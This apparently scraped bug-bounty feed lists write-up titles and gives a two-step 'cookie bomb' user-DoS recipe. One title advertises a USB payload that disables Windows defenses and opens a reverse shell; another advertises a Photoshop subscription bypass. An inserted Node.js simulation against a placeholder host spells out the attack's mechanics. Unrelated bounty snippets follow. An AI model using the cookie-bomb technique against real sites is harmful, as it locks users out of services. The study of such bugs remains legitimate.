Bugcrowd’s Status – Feb 05th, 2020: currently ranked #65 (as of Feb 05th, 2020) on the Bugcrowd Bug Bounty Platform with: P1 Warrior (since 2019): 5th Tier...
- From Recon to Optimizing RCE Results – Simple Story with One of the Biggest ICT Company in the World
- If Allah willed it, will be back soon!
- 5,000 USD XSS Issue at Avast Desktop AntiVirus for Windows (Yes, Desktop!)
- CVE-2019–18624 – Illegal Rendered at Download Feature in Several Apps (including Opera Mini) that Lead to Extension Manipulation (with RTLO)
- Race Condition that could Result to RCE – (A story with an App that temporary stored an uploaded file within 2 seconds before moving it to Amazon S3)
- USB HID – Rubber Duck Payload – Auto Turn Off UAC, Firewall, & Defender at Windows 10 & Connect to Reverse Shell in 10 sec
- Adobe Photoshop CC 2019 v. 20.0.0 (for OS X) Expired Subscription Bypass – Bypass Trial Expired
Cookie Bomb - User DoS (P2)🍪💣
1. Find a cookie that's based on a parameter value such as a link click tracker.
2. Build a PoC that sets large cookies until the server refuses all requests.
If the value is URL-encoded, use a bunch of commas.
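As an added example, not code from the original post, the following Node.js model walks through the two steps above: a hypothetical endpoint copies a URL parameter into a cookie, the attacker fills cookies to the browser's per-cookie limit, and the server refuses every request once the Cookie header exceeds its header buffer. The 4096-byte per-cookie limit, the 8192-byte server header limit, the endpoint and the cookie name `click_<n>` are all assumptions for the model. It also shows why commas matter when the stored value is URL-encoded: each `,` travels as one byte in the link but is stored as `%2C`, three bytes, so the attacker needs far fewer characters per link.

```javascript
// Added example (not from the original post): a Node.js model of a cookie bomb.
// Assumptions: a hypothetical tracker endpoint stores a URL parameter in a
// cookie named click_<n>; browsers cap one cookie at 4096 bytes; the server
// rejects any request whose Cookie header exceeds 8192 bytes.
const MAX_COOKIE_BYTES = 4096;
const MAX_HEADER_BYTES = 8192;

// What the vulnerable endpoint stores. If it URL-encodes the value first,
// every ',' becomes '%2C', so the stored value is 3x the attacker's input.
function storedCookieValue(paramValue, urlEncoded) {
  return urlEncoded ? encodeURIComponent(paramValue) : paramValue;
}

// Attacker-chosen parameter value that fills one cookie to about targetBytes
// after the server's encoding step. Commas are legal unencoded in a query
// string (1 byte each in the link) but inflate to 3 bytes once encoded;
// without encoding, plain 'A's are used and nothing inflates.
function bombValue(targetBytes, urlEncoded) {
  const filler = urlEncoded ? ',' : 'A';
  const bytesPerChar = urlEncoded ? 3 : 1;
  return filler.repeat(Math.floor(targetBytes / bytesPerChar));
}

// Attacker link the victim is lured into loading (e.g. via a hidden img/iframe).
function buildLink(n, paramValue) {
  return `https://target.example/track?id=click_${n}&ref=${paramValue}`;
}

// Browser-side cookie jar: a cookie over the per-cookie limit is dropped.
function setCookie(jar, name, value) {
  const entry = `${name}=${value}`;
  if (Buffer.byteLength(entry) > MAX_COOKIE_BYTES) return false;
  jar.set(name, value);
  return true;
}

function cookieHeader(jar) {
  return [...jar].map(([k, v]) => `${k}=${v}`).join('; ');
}

// Server front end: once the Cookie header is too large it answers
// 431 (Request Header Fields Too Large) for every URL on the host.
function serverStatus(header) {
  return Buffer.byteLength(header) > MAX_HEADER_BYTES ? 431 : 200;
}

// Victim loads attacker links click_0, click_1, ... until the host stops
// serving. Reports how many cookies that took and how many characters the
// attacker had to place in links to get there.
function runBomb(urlEncoded, maxClicks = 50) {
  const jar = new Map();
  let linkChars = 0;
  for (let n = 0; n < maxClicks; n++) {
    const param = bombValue(MAX_COOKIE_BYTES - 32, urlEncoded);
    linkChars += buildLink(n, param).length;
    setCookie(jar, `click_${n}`, storedCookieValue(param, urlEncoded));
    const header = cookieHeader(jar);
    const headerBytes = Buffer.byteLength(header);
    if (serverStatus(header) === 431) {
      return { cookiesNeeded: n + 1, linkChars, headerBytes, status: 431 };
    }
  }
  const header = cookieHeader(jar);
  return { cookiesNeeded: maxClicks, linkChars, headerBytes: Buffer.byteLength(header), status: 200 };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('server URL-encodes value :', runBomb(true));
  console.log('server stores value as-is:', runBomb(false));
}
```

Both runs end in 431 after the same number of cookies, because the attacker fills each cookie to the limit either way; the comma trick only shortens the links (about one third the characters), which is what you need when the tracker URL has a length limit. The cookies persist, so the victim keeps getting 431 on that host until they clear them, which is the user-DoS impact.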
I received a $500 reward from Facebook for a DoS I found in Instagram direct messages. Below is a scenario that shows the impact on group messages.
Good slides: https://docs.google.com/presentation/d/1N9Ygrpg0Z-1GFDhLMiG3jJV6B_yGqBk8tuRWO1ZicV8/edit#slide=id.g82807e23a8_0_8
The last trick (Authy 2FA bypass) is covered in "Idor to Shell" from @PentesterLab
My first bounty + first CVE, CVE-2013-6674, was from Mozilla back on 2014-01-29. The vulnerability was a Stored XSS and affected the Mozilla Thunderbird email client (desktop version). It affected millions of users at that time.
More details + POC Video:
Incredible research: $75,000 bounty🤯
"My research uncovered 7 0day vulnerabilities in Safari (CVE-2020-3852, CVE-2020-3864, CVE-2020-3865, CVE-2020-3885, CVE-2020-3887, CVE-2020-9784, & CVE-2020-9787); 3 were used in a kill chain to access the camera."